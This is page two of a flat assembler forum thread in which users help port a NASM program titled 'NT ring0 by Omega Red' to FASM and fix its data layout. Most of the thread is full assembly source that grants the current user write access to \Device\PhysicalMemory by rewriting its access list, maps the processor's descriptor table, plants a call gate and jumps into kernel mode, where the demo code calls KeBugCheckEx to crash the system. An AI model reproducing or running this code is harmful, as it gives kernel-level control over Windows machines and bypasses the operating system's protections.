flat assembler
Message board for the users of flat assembler.
Index
> Windows > Help transalating fixing huge nasm code Goto page Previous 1, 2 |
Author |
|
shism2 05 Mar 2006, 19:41
We have some of the equates or structures wrong... That's the only reason it wouldn't work
|
|||
05 Mar 2006, 19:41 |
|
okasvi 05 Mar 2006, 19:55
went thru all pushes and they seem to be identical (when pushing equates)
so structure most likely... im guessing this is wrong: Code: EXPLICIT_ACCESS_SIZE equ EXPLICIT_ACCESS_END-EXPLICIT_ACCESS_BEG access: times EXPLICIT_ACCESS_SIZE dd 0 EXPLICIT_ACCESS_BEG: struct EXPLICIT_ACCESS grfAccessPermissions dd ? grfAccessMode dd ? grfInheritance dd ? Trustee dd ? ends struct TRUSTEE pMultipleTrustee dd ? MultipleTrusteeOperation dd ? TrusteeForm dd ? TrusteeType dd ? ptstrName dd ? ends EXPLICIT_ACCESS_END: _________________ When We Ride On Our Enemies support reverse smileys |: |
|||
05 Mar 2006, 19:55 |
|
okasvi 05 Mar 2006, 20:06
i found original coder's include files
google<3 _________________ When We Ride On Our Enemies support reverse smileys |: |
|||
05 Mar 2006, 20:06 |
|
shism2 05 Mar 2006, 20:16
where where show me
|
|||
05 Mar 2006, 20:16 |
|
okasvi 05 Mar 2006, 20:55
eh, somewhat obvious
google for " "Omega Red" nasm " 1st link -> asm -> inc.zip add me to your msn... _________________ When We Ride On Our Enemies support reverse smileys |: |
|||
05 Mar 2006, 20:55 |
|
shism2 05 Mar 2006, 22:03
I did but you don't show up.. Btw I got it working and the problem was the obj attributes struct
|
|||
05 Mar 2006, 22:03 |
|
shism2 05 Mar 2006, 22:09
Code: OBJ_CASE_INSENSITIVE equ 40h OBJ_KERNEL_HANDLE equ 200h SE_KERNEL_OBJECT equ 6 DACL_SECURITY_INFORMATION equ 4 GRANT_ACCESS equ 1 NO_INHERITANCE equ 0 NO_MULTIPLE_TRUSTEE equ 0 TRUSTEE_IS_NAME equ 1 TRUSTEE_IS_USER equ 1 KGDT_R0_CODE equ 8 REVOKE_ACCESS equ 800 SYSTEM_MODULE_SIZE equ 284 MAX_MODULE_COUNT equ 1024 SYSTEM_MODULE_INFORMATION_SIZE equ 290820 SystemModuleInformation equ 11 MAXIMUM_FILENAME_LENGTH equ 256 gdt: gdt_limit rw 1 gdt_base rd 1 farcall: rw 3 txtbuf rb 4096 mem_section rd 1 mapped_size rd 1 map_base rd 1 p_old_dacl rd 1 p_new_dacl rd 1 p_sec_descr rd 1 sys_info SYSTEM_INFO ntoskrnl rd 1 align 4 modinfo rb SYSTEM_MODULE_INFORMATION_SIZE m_caption db "NT ring0 by Omega Red",0 f_err db "Error: %s, code: 0x%x",0 e_opens1 db "NtOpenSection for DACL access failed",0 e_opens2 db "NtOpenSection for r/w failed",0 e_getsec db "GetSecurityInfo failed",0 e_setacl db "SetEntriesInAclA failed",0 e_setsec db "SetSecurityInfo failed",0 e_maps db "NtMapViewOfSection failed",0 e_unmaps db "NtUnmapViewOfSection failed",0 e_query db "NtQuerySystemInformation failed",0 e_ntos db "ntoskrnl.exe module not found in memory!",0 s_cur_user db "CURRENT_USER",0 align 4 callgate dw 0 ; low part of address dw 8 ; segment selector: #define KGDT_R0_CODE 8 dw 1110110000000001b ; misc bits ;P (5 lowest = # of params) dw 0 ; high part of address align 4 s_mem_dev_uni du "\Device\PhysicalMemory" mem_dev_uni_len equ $-s_mem_dev_uni align 4 mem_dev_name: ; unicode_string dw mem_dev_uni_len dw mem_dev_uni_len+2 dd s_mem_dev_uni phys_address dd 0,0 align 4 access: times EXPLICIT_ACCESS_SIZE db 0 align 4 obj_attr: dd OBJECT_ATTRIBUTES_SIZE dd 0 dd mem_dev_name dd OBJ_CASE_INSENSITIVE OR OBJ_KERNEL_HANDLE dd 0 dd 0 struct SYSTEM_MODULE Reserved1 rd 1 Reserved2 rd 1 ImageBaseAddress rd 1 ImageSize rd 1 ; bytes Flags rd 1 Index rw 1 ; zero based wRank rw 1 ; 0 if not assigned Unknown rw 1 ModuleNameOffset rw 1 ImageName rb MAXIMUM_FILENAME_LENGTH ends ring0start: mov edi, modinfo mov ecx, SYSTEM_MODULE_INFORMATION_SIZE/4 xor eax, eax rep stosd ; get allocation granularity (used in memory mapping) invoke GetSystemInfo, sys_info ; find NtOsKrnl base call GetNtoskrnl ; open handle to the object invoke NtOpenSection, mem_section, WRITE_DAC OR READ_CONTROL, obj_attr stdcall NtErrorTest ,e_opens1 ; get security descriptor invoke GetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, p_old_dacl, 0, p_sec_descr stdcall ErrorTestZ, e_getsec ; modify access rights ;] mov dword [access+EXPLICIT_ACCESS.grfAccessPermissions], SECTION_ALL_ACCESS mov dword [access+EXPLICIT_ACCESS.grfAccessMode], GRANT_ACCESS mov dword [access+EXPLICIT_ACCESS.grfInheritance], NO_INHERITANCE mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.MultipleTrusteeOperation], NO_MULTIPLE_TRUSTEE mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeForm], TRUSTEE_IS_NAME mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeType], TRUSTEE_IS_USER mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.ptstrName], s_cur_user ; create new acl invoke SetEntriesInAcl, 1, access, [p_old_dacl], p_new_dacl stdcall ErrorTestZ, e_setacl ; update security descriptor with new acl invoke SetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, [p_new_dacl], 0 stdcall ErrorTestZ, e_setsec invoke LocalFree, [p_sec_descr] invoke NtClose, [mem_section] ; ok.. now we have writable physical memory ;] ; open it in r/w mode invoke NtOpenSection, mem_section, SECTION_MAP_READ OR SECTION_MAP_WRITE, obj_attr stdcall NtErrorTest, e_opens2 ; setup callgate (proc offset) mov eax, ring0_proc mov [callgate], ax shr eax, 16 mov [callgate+6], ax ; get gdt sgdt [gdt] movzx ebx, word [gdt_limit] mov eax, [gdt_base] call GetPhysicalAddress mov [phys_address], eax stdcall MapMemory, [gdt_base], ebx, PAGE_READWRITE ; install callgate to our ring0 code in gdt - entry #100 (free) ; this should *find* some empty descriptor, but i'm too lazy at the moment ;P mov eax, [map_base] push dword [callgate] pop dword [eax+100*8] push dword [callgate+4] pop dword [eax+100*8+4] ; ok.. almost there.. prepare far call mov word [farcall+4], 100*8+3 ; our callgate selector ; lock the ring0 code to minimize chance that it will be paged out ; well, it *can* be paged out, only code in nonpaged kernel pool *can't* be really paged... invoke VirtualLock, ring0_proc, ring0_end-ring0_proc ; and.. jump! push dword [ntoskrnl] call far [farcall] ; cleanup invoke VirtualUnlock, ring0_proc, ring0_end-ring0_proc invoke NtUnmapViewOfSection, -1, [map_base] stdcall NtErrorTest, e_unmaps invoke NtClose, [mem_section] ret ;-------------------------------------------------------------------- GetNtoskrnl: ; enum modules invoke NtQuerySystemInformation, SystemModuleInformation, modinfo, SYSTEM_MODULE_INFORMATION_SIZE, 0 stdcall NtErrorTest, e_query mov ebx, dword [modinfo] ; count mov esi, modinfo+4 ; 1st module .1: ; loop mov edi, esi add edi, SYSTEM_MODULE.ImageName invoke PathFindFileName, edi or dword [eax], 20202020h ; convert to lowercase cmp dword [eax], 'ntos' jne .2 or dword [eax+4], 20202020h cmp dword [eax+4], 'krnl' jne .2 or dword [eax+8], 20202020h cmp dword [eax+8], '.exe' jne .2 ; ok, seems we have it (although should check for 0 at the end, maybe its `ntoskrnl.exe.blah' ;P) mov eax, dword [esi+SYSTEM_MODULE.ImageBaseAddress] ; base in memory mov [ntoskrnl], eax ret .2: add esi, SYSTEM_MODULE_SIZE dec ebx jns .1 ; umm.. ntoskrnl not found - quite unlikely to happen ;] invoke MessageBox, 0, e_ntos, 0, 0 invoke ExitProcess, 2 ;-------------------------------------------------------------------- ; substitute for MmGetPhysicalAddress - not always ok, but for this purpose sufficient ; input: linear address in eax GetPhysicalAddress: cmp eax, 80000000h jae .1 cmp eax, 0A0000000h jb .1 and eax, 0FFFF000h ret .1: and eax, 1FFFF000h ret ;-------------------------------------------------------------------- ; maps memory using \Device\PhysicalMemory proc MapMemory,base, size, access_mode mov eax, [base] ; address xor edx, edx push eax div dword [sys_info+SYSTEM_INFO.dwAllocationGranularity] ; edx = offset mov edi, edx pop eax mov ebx, [size] ; size inc ebx mov esi, ebx ; mapped size add esi, edi sub eax, edi call GetPhysicalAddress mov [phys_address], eax mov [mapped_size], esi mov eax, [mem_section] invoke NtMapViewOfSection, eax, -1, map_base, 0, esi, phys_address, mapped_size, 1, 0, [access_mode] add [map_base], edi stdcall NtErrorTest,e_maps ret endp ;-------------------------------------------------------------------- proc NtErrorTest, er_msg test eax, eax jz .ok invoke wsprintf, txtbuf, f_err, [er_msg], eax invoke MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING invoke NtClose, [mem_section] invoke ExitProcess, 1 .ok: ret endp ;-------------------------------------------------------------------- proc ErrorTest,e_msg test eax, eax jnz .ok call GetLastError invoke wsprintf, txtbuf, f_err, [e_msg], eax invoke MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING invoke NtClose, [mem_section] invoke ExitProcess, 1 .ok: ret endp ;-------------------------------------------------------------------- proc ErrorTestZ ,e1_msg test eax, eax jz .ok invoke GetLastError invoke wsprintf, txtbuf, f_err, [e1_msg], eax invoke MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING invoke NtClose, [mem_section] invoke ExitProcess, 1 .ok: ret endp ;-------------------------------------------------------------------- ; the real deal ;] ring0_proc: cli mov eax, [esp+8] ; param - ntoskrnl base push ebx push edx push esi push edi ; find KeBugCheckEx in exports mov ebx, eax add eax, [eax+0x3c] mov edi, dword [eax+0x78] add edi, ebx mov esi, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfNames] add esi, ebx xor edx, edx .name: mov eax, [esi] add eax, ebx ; check function name cmp dword [eax+00h], "KeBu" jne .F cmp dword [eax+04h], "gChe" jne .F cmp dword [eax+08h], "ckEx" jne .F mov eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfOrdinals] add eax, ebx movzx esi, word [edx*2+eax] mov eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions] add eax, ebx mov esi, [esi*4+eax] add esi, ebx jmp .fnd .F: add esi, 4 inc edx cmp edx, [edi+IMAGE_EXPORT_DIRECTORY.NumberOfNames] jne .name .fnd: mov eax, esi pop edi pop esi pop edx pop ebx ; int3 stdcall eax, 0xdeadbeef, 0xdead, 0xbeef, 0xcafe, 0xbabe retf 4 ring0_end: |
|||
05 Mar 2006, 22:09 |
|
shism2 06 Mar 2006, 03:24
The only problem now is that the file IS HUGE compared to the original nasm file.. And the problem causing that is
modinfo rb SYSTEM_MODULE_INFORMATION_SIZE |
|||
06 Mar 2006, 03:24 |
|
LocoDelAssembly 06 Mar 2006, 04:04
Move it at the end of the source code. In fact, to save even more space put ALL the uninitialized data join together at the end of source.
|
|||
06 Mar 2006, 04:04 |
|
okasvi 06 Mar 2006, 04:22
reorder your sources to be like this
1st [---equ's---] 2nd [---code---] 3rd Code: ;-------------------------------------------------------------------- section '.data' data readable writeable m_caption db "NT ring0 by Omega Red",0 f_err db "Error: %s, code: 0x%x",0 e_opens1 db "NtOpenSection for DACL access failed",0 e_opens2 db "NtOpenSection for r/w failed",0 e_getsec db "GetSecurityInfo failed",0 e_setacl db "SetEntriesInAclA failed",0 e_setsec db "SetSecurityInfo failed",0 e_maps db "NtMapViewOfSection failed",0 e_unmaps db "NtUnmapViewOfSection failed",0 e_query db "NtQuerySystemInformation failed",0 e_ntos db "ntoskrnl.exe module not found in memory!",0 s_cur_user db "CURRENT_USER",0 align 4 callgate dw 0 ; low part of address dw 8 ; segment selector: #define KGDT_R0_CODE 8 dw 1110110000000001b ; misc bits ;P (5 lowest = # of params) dw 0 ; high part of address align 4 s_mem_dev_uni du "\Device\PhysicalMemory" mem_dev_uni_len equ $-s_mem_dev_uni align 4 mem_dev_name: ; unicode_string dw mem_dev_uni_len dw mem_dev_uni_len+2 dd s_mem_dev_uni phys_address dd 0,0 align 4 OBJECT_ATTRIBUTES_SIZE equ 24 obj_attr: dd OBJECT_ATTRIBUTES_SIZE dd 0 dd mem_dev_name dd OBJ_CASE_INSENSITIVE OR OBJ_KERNEL_HANDLE dd 0 dd 0 align 4 EXPLICIT_ACCESS_SIZE equ 32 access: times EXPLICIT_ACCESS_SIZE dd 0 align 4 struct TRUSTEE pMultipleTrustee rd 1 MultipleTrusteeOperation rd 1 TrusteeForm rd 1 TrusteeType rd 1 ptstrName rd 1 ends TRUSTEE_SIZE equ 20 align 4 struct EXPLICIT_ACCESS grfAccessPermissions rd 1 grfAccessMode rd 1 grfInheritance rd 1 Trustee rb TRUSTEE_SIZE ends struct SYSTEM_MODULE_INFORMATION dCount rd 1 m_tam rb SYSTEM_MODULE_SIZE*MAX_MODULE_COUNT ; arbitrary max count - not defined anywhere ends struct SYSTEM_MODULE dReserved01 rd 1 d04 rd 1 pAddress rd 1 dSize rd 1 ; bytes dFlags rd 1 wId rw 1 ; zero based wRank rw 1 ; 0 if not assigned w18 rw 1 wNameOffset rw 1 abName rb MAXIMUM_FILENAME_LENGTH ends ;-------------------------------------------------------------------- section '.idata' import data readable writeable library ntdll,'ntdll.dll',\ shlwapi,'shlwapi.dll',\ kernel32,'kernel32.dll',\ user32,'user32.dll',\ advapi32,'advapi32.dll' import shlwapi,\ PathFindFileName ,'PathFindFileNameA' import ntdll,\ NtClose,'NtClose',\ NtMapViewOfSection,'NtMapViewOfSection',\ NtOpenSection,'NtOpenSection',\ NtQuerySystemInformation,'NtQuerySystemInformation',\ NtUnmapViewOfSection,'NtUnmapViewOfSection' import kernel32,\ GetProcAddress,'GetProcAddress',\ GetSystemInfo,'GetSystemInfo',\ ExitProcess,'ExitProcess',\ LoadLibrary,'LoadLibraryA',\ LocalFree,'LocalFree',\ VirtualLock,'VirtualLock',\ VirtualUnlock,'VirtualUnlock' import advapi32,\ GetSecurityInfo,'GetSecurityInfo',\ SetEntriesInAcl,'SetEntriesInAclA',\ SetSecurityInfo,'SetSecurityInfo' import user32,\ MessageBox,'MessageBoxA',\ wsprintf,'wsprintfA' section '.udata' readable writeable struct IMAGE_EXPORT_DIRECTORY Characteristics rd 1 TimeDateStamp rd 1 MajorVersion rw 1 MinorVersion rw 1 nName rd 1 nBase rd 1 NumberOfFunctions rd 1 NumberOfNames rd 1 AddressOfFunctions rd 1 AddressOfNames rd 1 AddressOfNameOrdinals rd 1 ends gdt: gdt_limit rw 1 gdt_base rd 1 farcall: rw 3 txtbuf rb 4096 mem_section rd 1 mapped_size rd 1 map_base rd 1 p_old_dacl rd 1 p_new_dacl rd 1 p_sec_descr rd 1 sys_info SYSTEM_INFO ntoskrnl rd 1 align 4 modinfo rb SYSTEM_MODULE_INFORMATION_SIZE _________________ When We Ride On Our Enemies support reverse smileys |: |
|||
06 Mar 2006, 04:22 |
|
madmatt 06 Mar 2006, 06:46
You need to put your large data into a ".bss" section
|
|||
06 Mar 2006, 06:46 |
|
LocoDelAssembly 06 Mar 2006, 13:52
Well, if you put the data on a separated section then you don't need to put uninitialized data at the end of the source but at the end of the section and the section can be placed anywhere.
|
|||
06 Mar 2006, 13:52 |
|
shism2 06 Mar 2006, 19:26
Still got the problem
Code: OBJ_CASE_INSENSITIVE equ 40h OBJ_KERNEL_HANDLE equ 200h SE_KERNEL_OBJECT equ 6 DACL_SECURITY_INFORMATION equ 4 GRANT_ACCESS equ 1 NO_INHERITANCE equ 0 NO_MULTIPLE_TRUSTEE equ 0 TRUSTEE_IS_NAME equ 1 TRUSTEE_IS_USER equ 1 KGDT_R0_CODE equ 8 REVOKE_ACCESS equ 800 SYSTEM_MODULE_SIZE equ 284 MAX_MODULE_COUNT equ 1024 SYSTEM_MODULE_INFORMATION_SIZE equ 290820 SystemModuleInformation equ 11 MAXIMUM_FILENAME_LENGTH equ 256 ring0start: mov edi, modinfo mov ecx, SYSTEM_MODULE_INFORMATION_SIZE/4 xor eax, eax rep stosd ; get allocation granularity (used in memory mapping) invoke GetSystemInfo, sys_info ; find NtOsKrnl base call GetNtoskrnl ; open handle to the object invoke NtOpenSection, mem_section, WRITE_DAC OR READ_CONTROL, obj_attr stdcall NtErrorTest ,e_opens1 ; get security descriptor invoke GetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, p_old_dacl, 0, p_sec_descr stdcall ErrorTestZ, e_getsec ; modify access rights ;] mov dword [access+EXPLICIT_ACCESS.grfAccessPermissions], SECTION_ALL_ACCESS mov dword [access+EXPLICIT_ACCESS.grfAccessMode], GRANT_ACCESS mov dword [access+EXPLICIT_ACCESS.grfInheritance], NO_INHERITANCE mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.MultipleTrusteeOperation], NO_MULTIPLE_TRUSTEE mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeForm], TRUSTEE_IS_NAME mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeType], TRUSTEE_IS_USER mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.ptstrName], s_cur_user ; create new acl invoke SetEntriesInAcl, 1, access, [p_old_dacl], p_new_dacl stdcall ErrorTestZ, e_setacl ; update security descriptor with new acl invoke SetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, [p_new_dacl], 0 stdcall ErrorTestZ, e_setsec invoke LocalFree, [p_sec_descr] invoke NtClose, [mem_section] ; ok.. now we have writable physical memory ;] ; open it in r/w mode invoke NtOpenSection, mem_section, SECTION_MAP_READ OR SECTION_MAP_WRITE, obj_attr stdcall NtErrorTest, e_opens2 ; setup callgate (proc offset) mov eax, ring0_proc mov [callgate], ax shr eax, 16 mov [callgate+6], ax ; get gdt sgdt [gdt] movzx ebx, word [gdt_limit] mov eax, [gdt_base] call GetPhysicalAddress mov [phys_address], eax stdcall MapMemory, [gdt_base], ebx, PAGE_READWRITE ; install callgate to our ring0 code in gdt - entry #100 (free) ; this should *find* some empty descriptor, but i'm too lazy at the moment ;P mov eax, [map_base] push dword [callgate] pop dword [eax+100*8] push dword [callgate+4] pop dword [eax+100*8+4] ; ok.. almost there.. prepare far call mov word [farcall+4], 100*8+3 ; our callgate selector ; lock the ring0 code to minimize chance that it will be paged out ; well, it *can* be paged out, only code in nonpaged kernel pool *can't* be really paged... invoke VirtualLock, ring0_proc, ring0_end-ring0_proc ; and.. jump! push dword [ntoskrnl] call far [farcall] ; cleanup invoke VirtualUnlock, ring0_proc, ring0_end-ring0_proc invoke NtUnmapViewOfSection, -1, [map_base] stdcall NtErrorTest, e_unmaps invoke NtClose, [mem_section] ret ;-------------------------------------------------------------------- GetNtoskrnl: ; enum modules invoke NtQuerySystemInformation, SystemModuleInformation, modinfo, SYSTEM_MODULE_INFORMATION_SIZE, 0 stdcall NtErrorTest, e_query mov ebx, dword [modinfo] ; count mov esi, modinfo+4 ; 1st module .1: ; loop mov edi, esi add edi, SYSTEM_MODULE.ImageName invoke PathFindFileName, edi or dword [eax], 20202020h ; convert to lowercase cmp dword [eax], 'ntos' jne .2 or dword [eax+4], 20202020h cmp dword [eax+4], 'krnl' jne .2 or dword [eax+8], 20202020h cmp dword [eax+8], '.exe' jne .2 ; ok, seems we have it (although should check for 0 at the end, maybe its `ntoskrnl.exe.blah' ;P) mov eax, dword [esi+SYSTEM_MODULE.ImageBaseAddress] ; base in memory mov [ntoskrnl], eax ret .2: add esi, SYSTEM_MODULE_SIZE dec ebx jns .1 ; umm.. ntoskrnl not found - quite unlikely to happen ;] invoke MessageBox, 0, e_ntos, 0, 0 invoke ExitProcess, 2 ;-------------------------------------------------------------------- ; substitute for MmGetPhysicalAddress - not always ok, but for this purpose sufficient ; input: linear address in eax GetPhysicalAddress: cmp eax, 80000000h jae .1 cmp eax, 0A0000000h jb .1 and eax, 0FFFF000h ret .1: and eax, 1FFFF000h ret ;-------------------------------------------------------------------- ; maps memory using \Device\PhysicalMemory proc MapMemory,base, size, access_mode mov eax, [base] ; address xor edx, edx push eax div dword [sys_info+SYSTEM_INFO.dwAllocationGranularity] ; edx = offset mov edi, edx pop eax mov ebx, [size] ; size inc ebx mov esi, ebx ; mapped size add esi, edi sub eax, edi call GetPhysicalAddress mov [phys_address], eax mov [mapped_size], esi mov eax, [mem_section] invoke NtMapViewOfSection, eax, -1, map_base, 0, esi, phys_address, mapped_size, 1, 0, [access_mode] add [map_base], edi stdcall NtErrorTest,e_maps ret endp ;-------------------------------------------------------------------- proc NtErrorTest, er_msg test eax, eax jz .ok invoke wsprintf, txtbuf, f_err, [er_msg], eax invoke MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING invoke NtClose, [mem_section] invoke ExitProcess, 1 .ok: ret endp ;-------------------------------------------------------------------- proc ErrorTest,e_msg test eax, eax jnz .ok call GetLastError invoke wsprintf, txtbuf, f_err, [e_msg], eax invoke MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING invoke NtClose, [mem_section] invoke ExitProcess, 1 .ok: ret endp ;-------------------------------------------------------------------- proc ErrorTestZ ,e1_msg test eax, eax jz .ok invoke GetLastError invoke wsprintf, txtbuf, f_err, [e1_msg], eax invoke MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING invoke NtClose, [mem_section] invoke ExitProcess, 1 .ok: ret endp ;-------------------------------------------------------------------- ; the real deal ;] ring0_proc: cli mov eax, [esp+8] ; param - ntoskrnl base push ebx push edx push esi push edi ; find KeBugCheckEx in exports mov ebx, eax add eax, [eax+0x3c] mov edi, dword [eax+0x78] add edi, ebx mov esi, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfNames] add esi, ebx xor edx, edx .name: mov eax, [esi] add eax, ebx ; check function name cmp dword [eax+00h], "KeBu" jne .F cmp dword [eax+04h], "gChe" jne .F cmp dword [eax+08h], "ckEx" jne .F mov eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfOrdinals] add eax, ebx movzx esi, word [edx*2+eax] mov eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions] add eax, ebx mov esi, [esi*4+eax] add esi, ebx jmp .fnd .F: add esi, 4 inc edx cmp edx, [edi+IMAGE_EXPORT_DIRECTORY.NumberOfNames] jne .name .fnd: mov eax, esi pop edi pop esi pop edx pop ebx ; int3 stdcall eax, 0xdeadbeef, 0xdead, 0xbeef, 0xcafe, 0xbabe retf 4 ring0_end: section '.bss' readable writeable gdt: gdt_limit rw 1 gdt_base rd 1 farcall: rw 3 txtbuf rb 4096 mem_section rd 1 mapped_size rd 1 map_base rd 1 p_old_dacl rd 1 p_new_dacl rd 1 p_sec_descr rd 1 sys_info SYSTEM_INFO ntoskrnl rd 1 align 4 modinfo rb SYSTEM_MODULE_INFORMATION_SIZE m_caption db "NT ring0 by Omega Red",0 f_err db "Error: %s, code: 0x%x",0 e_opens1 db "NtOpenSection for DACL access failed",0 e_opens2 db "NtOpenSection for r/w failed",0 e_getsec db "GetSecurityInfo failed",0 e_setacl db "SetEntriesInAclA failed",0 e_setsec db "SetSecurityInfo failed",0 e_maps db "NtMapViewOfSection failed",0 e_unmaps db "NtUnmapViewOfSection failed",0 e_query db "NtQuerySystemInformation failed",0 e_ntos db "ntoskrnl.exe module not found in memory!",0 s_cur_user db "CURRENT_USER",0 align 4 callgate dw 0 ; low part of address dw 8 ; segment selector: #define KGDT_R0_CODE 8 dw 1110110000000001b ; misc bits ;P (5 lowest = # of params) dw 0 ; high part of address align 4 s_mem_dev_uni du "\Device\PhysicalMemory" mem_dev_uni_len equ $-s_mem_dev_uni align 4 mem_dev_name: ; unicode_string dw mem_dev_uni_len dw mem_dev_uni_len+2 dd s_mem_dev_uni phys_address dd 0,0 align 4 access: times EXPLICIT_ACCESS_SIZE db 0 align 4 obj_attr: dd OBJECT_ATTRIBUTES_SIZE dd 0 dd mem_dev_name dd OBJ_CASE_INSENSITIVE OR OBJ_KERNEL_HANDLE dd 0 dd 0 struct SYSTEM_MODULE Reserved1 rd 1 Reserved2 rd 1 ImageBaseAddress rd 1 ImageSize rd 1 ; bytes Flags rd 1 Index rw 1 ; zero based wRank rw 1 ; 0 if not assigned Unknown rw 1 ModuleNameOffset rw 1 ImageName rb MAXIMUM_FILENAME_LENGTH ends |
|||
06 Mar 2006, 19:26 |
|
okasvi 06 Mar 2006, 22:42
k, here it is 4kb in size, somewhat ugly src but i was just converting it to fasm without thinking what it looks like...
_________________ When We Ride On Our Enemies support reverse smileys |: |
|||||||||||
06 Mar 2006, 22:42 |
|
shism2 06 Mar 2006, 22:49
asdfasdf
|
|||||||||||
06 Mar 2006, 22:49 |
|
LocoDelAssembly 07 Mar 2006, 04:51
shism2, you still get the same problem because you created a new section but with the uninitialized data placed before the initialized data. You can fix it adding a new section for uninitialized data (like okasvi), or:
LocoDelAssembly wrote: if you put the data on a separated section then you don't need to put uninitialized data at the end of the source but at the end of the section and the section can be placed anywhere. |
|||
07 Mar 2006, 04:51 |
|
Goto page Previous 1, 2 < Last Thread | Next Thread > |
Forum Rules:
|
Copyright © 1999-2025, Tomasz Grysztar. Also on GitHub, YouTube.
Website powered by rwasa.